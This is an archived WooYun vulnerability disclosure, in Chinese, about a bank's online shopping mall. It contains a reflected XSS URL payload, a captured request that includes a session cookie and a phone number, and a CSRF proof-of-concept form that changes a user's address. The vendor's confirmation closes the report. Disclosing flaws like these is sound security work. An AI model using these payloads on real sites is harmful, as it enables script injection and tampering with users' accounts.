乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-28: 细节已通知厂商并且等待厂商处理中 2015-04-29: 厂商已经确认,细节仅向厂商公开 2015-05-09: 细节向核心白帽子及相关领域专家公开 2015-05-19: 细节向普通白帽子公开 2015-05-29: 细节向实习白帽子公开 2015-06-13: 细节向公众公开
没事就出来透透气什么的。多么安逸的生活呀~!不想看见她安享晚年的时候就这么样的辛苦罢了
XSS漏洞:http://mall.grcbank.com/TopMallWeb/newpage/login/login.jsp?returnURL=%22%3E%3C/script%3E%3Ciframe/onload=alert%281%29%3E
还有【CSRF】问题url:http://mall.grcbank.com/TopMallWeb/clientAction!mentionAddress.action?oper=custAddInfo添加地址的时候无token无限制以下是抓到包的信息:
POST /TopMallWeb/clientAction!saveCustAddsInfo.action HTTP/1.1Host: mall.grcbank.comProxy-Connection: keep-aliveContent-Length: 174Accept: application/json, text/javascript, */*; q=0.01Origin: http://mall.grcbank.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://mall.grcbank.com/TopMallWeb/clientAction!mentionAddress.action?oper=custAddInfoAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: BIGipServermall_pool_8078=857739948.36383.0000; JSESSIONID=0000nM4U1r4LLgkV55m7c6e6X0_:17seg0bh6; userInfo=yongshaocmbProvince=%E5%B9%BF%E4%B8%9C%E7%9C%81&cmbCity=%E5%B9%BF%E5%B7%9E%E5%B8%82&cmbArea=%E8%8D%94%E6%B9%BE%E5%8C%BA&edit_csg_address=vhjiojfgi&userName3=test&custMob3=13416364102
然后直接就能构造POC了。下面提供POC下
<html> <body> <form action="http://mall.grcbank.com/TopMallWeb/clientAction!saveCustAddsInfo.action" method="POST"> <input type="hidden" name="cmbProvince" value="广东省" /> <input type="hidden" name="cmbCity" value="广州市" /> <input type="hidden" name="cmbArea" value="荔湾区" /> <input type="hidden" name="edit_csg_address" value="vhjiojfgi" /> <input type="hidden" name="userName3" value="test" /> <input type="hidden" name="custMob3" value="13416364102" /> <input type="submit" value="Submit request" /> </form> </body></html>
=。=麻麻说我不能再调皮了
危害等级:低
漏洞Rank:3
确认时间:2015-04-29 14:11
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:低攻击成本:低造成影响:低综合评级为:低,rank:3正在联系相关网站管理单位处置。
暂无